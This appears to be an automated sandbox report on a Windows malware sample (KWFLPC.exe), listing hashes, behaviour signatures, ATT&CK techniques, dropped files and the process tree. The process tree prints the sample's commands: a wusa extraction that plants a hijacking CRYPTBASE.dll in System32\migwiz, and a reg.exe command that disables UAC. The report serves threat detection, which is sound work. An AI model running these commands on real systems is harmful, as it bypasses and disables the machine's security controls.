6410f220fdbd34dae565f5fba45e85107741c13d19a91b3126e735fbe0425606

General

Target

KWFLPC.exe
Size

423KB
MD5

1cd8a018b6af07d08c22bd6429014b0e
SHA1

1939f5b1f15389106b84cdfe51bf9f3ba6b3c473
SHA256

6410f220fdbd34dae565f5fba45e85107741c13d19a91b3126e735fbe0425606
SHA512

b61df7dd7c5ff11345c6a3d4aacc00578c983769481872d08a08459765953688b0d67a9ce7bc1dcdfeadc64e274581a8129689098e35f26ab32bbf208d76bdb5

Score

10^/10

evasion spyware stealer trojan

Malware Config

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Loads dropped DLL 1 IoCs

Processes:

migwiz.exe

pid process

1968 migwiz.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1968	migwiz.exe

Drops file in System32 directory 4 IoCs

Processes:

wusa.exe

description	ioc	process
File created	C:\Windows\system32\migwiz\$dpx$.tmp\1a4f651314d38a478e77d1210402df2c.tmp	wusa.exe
File opened for modification	C:\Windows\system32\migwiz\cryptbase.dll	wusa.exe
File opened for modification	C:\Windows\system32\migwiz\$dpx$.tmp\job.xml	wusa.exe
File opened for modification	C:\Windows\system32\migwiz\$dpx$.tmp	wusa.exe

Drops file in Windows directory 3 IoCs

Processes:

wusa.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1764 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

Notepad.exe

pid process

1072 Notepad.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

migwiz.exe

pid process

1968 migwiz.exe

pid	process
1764	reg.exe

pid	process
1072	Notepad.exe

pid	process
1968	migwiz.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

KWFLPC.execmd.exeWScript.exemigwiz.execmd.exe

description	pid	process	target process
PID 1052 wrote to memory of 912	1052	KWFLPC.exe	cmd.exe
PID 1052 wrote to memory of 912	1052	KWFLPC.exe	cmd.exe
PID 1052 wrote to memory of 912	1052	KWFLPC.exe	cmd.exe
PID 1052 wrote to memory of 912	1052	KWFLPC.exe	cmd.exe
PID 912 wrote to memory of 956	912	cmd.exe	wusa.exe
PID 912 wrote to memory of 956	912	cmd.exe	wusa.exe
PID 912 wrote to memory of 956	912	cmd.exe	wusa.exe
PID 1052 wrote to memory of 1056	1052	KWFLPC.exe	WScript.exe
PID 1052 wrote to memory of 1056	1052	KWFLPC.exe	WScript.exe
PID 1052 wrote to memory of 1056	1052	KWFLPC.exe	WScript.exe
PID 1052 wrote to memory of 1056	1052	KWFLPC.exe	WScript.exe
PID 1056 wrote to memory of 1968	1056	WScript.exe	migwiz.exe
PID 1056 wrote to memory of 1968	1056	WScript.exe	migwiz.exe
PID 1056 wrote to memory of 1968	1056	WScript.exe	migwiz.exe
PID 1968 wrote to memory of 1964	1968	migwiz.exe	cmd.exe
PID 1968 wrote to memory of 1964	1968	migwiz.exe	cmd.exe
PID 1968 wrote to memory of 1964	1968	migwiz.exe	cmd.exe
PID 1964 wrote to memory of 1764	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1764	1964	cmd.exe	reg.exe
PID 1964 wrote to memory of 1764	1964	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\KWFLPC.exe
"C:\Users\Admin\AppData\Local\Temp\KWFLPC.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa C:\Users\Admin\AppData\Local\Temp\64.cab /quiet /extract:C:\Windows\system32\migwiz\ & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:912

C:\Windows\system32\wusa.exe
wusa C:\Users\Admin\AppData\Local\Temp\64.cab /quiet /extract:C:\Windows\system32\migwiz\
3⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:956

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\888.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:1056

C:\Windows\System32\migwiz\migwiz.exe
"C:\Windows\System32\migwiz\migwiz.exe" C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1968

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
4⤵
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
5⤵
- Modifies registry key
PID:1764

C:\Windows\system32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
1⤵
PID:1740

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\888.vbs
1⤵
- Opens file in notepad (likely ransom note)
PID:1072

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Bypass User Account Control

1

T1088

Defense Evasion

Bypass User Account Control

1

T1088

Disabling Security Tools

1

T1089

Modify Registry

2

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\64.cab
Filesize
49KB

MD5
8cfa6b4acd035a2651291a2a4623b1c7

SHA1
43571537bf2ce9f8e8089fadcbf876eaf4cf3ae9

SHA256
6e438201a14a70980048d2377c2195608d5dc2cf915f489c0a59ac0627c98fa9

SHA512
e0a73401ce74c8db69964ef5a53f2a1b8caf8c739359785970295dae82619e81c0a21466327a023cf4009e0c15981a20bf1e18c73821083908fce722faa82685

Download Submit
C:\Users\Admin\AppData\Local\Temp\888.vbs
Filesize
280B

MD5
8be57121a3ecae9c90cce4adf00f2454

SHA1
aca585c1b6409bc2475f011a436b319e42b356d8

SHA256
35d7204f9582b63b47942a4df9a55b8825b6d0af295b641f6257c39f7dda5f5e

SHA512
85521f6cd62dd5bb848933a188a9ddb83dd7ae2c5f4a97b65ba7785c3d58dba27694c7df308f4cf0fdaaa8c55251ff14ed1632e315a16d8d0b15217bac381f72

Download Submit
C:\Windows\System32\migwiz\CRYPTBASE.dll
Filesize
106KB

MD5
1deeaa34fc153cffb989ab43aa2b0527

SHA1
7a58958483aa86d29cba8fc20566c770e1989953

SHA256
c3cfa6c00f3d2536c640f1ee6df3f289818628c0e290be2f08df2c330097158a

SHA512
abbd5e28096a981a1d07a38bb1808fab590d78a890fc7960a86d8d9a1ae0c597eab655a2457d61afbfbce8c720965b89c1071759b819168b08058ee5be17dc86

Download Submit
\Windows\System32\migwiz\cryptbase.dll
Filesize
106KB

MD5
1deeaa34fc153cffb989ab43aa2b0527

SHA1
7a58958483aa86d29cba8fc20566c770e1989953

SHA256
c3cfa6c00f3d2536c640f1ee6df3f289818628c0e290be2f08df2c330097158a

SHA512
abbd5e28096a981a1d07a38bb1808fab590d78a890fc7960a86d8d9a1ae0c597eab655a2457d61afbfbce8c720965b89c1071759b819168b08058ee5be17dc86

Download Submit
memory/912-55-0x0000000000000000-mapping.dmp

Download
memory/956-57-0x000007FEFC5C1000-0x000007FEFC5C3000-memory.dmp

Filesize
8KB

Download
memory/956-56-0x0000000000000000-mapping.dmp

Download
memory/1052-54-0x0000000076C81000-0x0000000076C83000-memory.dmp

Filesize
8KB

Download
memory/1056-59-0x0000000000000000-mapping.dmp

Download
memory/1764-69-0x0000000000000000-mapping.dmp

Download
memory/1964-68-0x0000000000000000-mapping.dmp

Download
memory/1968-62-0x0000000000000000-mapping.dmp

Download
memory/1968-64-0x000007FEF5BB1000-0x000007FEF5BB3000-memory.dmp

Filesize
8KB

Download
memory/1968-65-0x000007FEF6361000-0x000007FEF6363000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads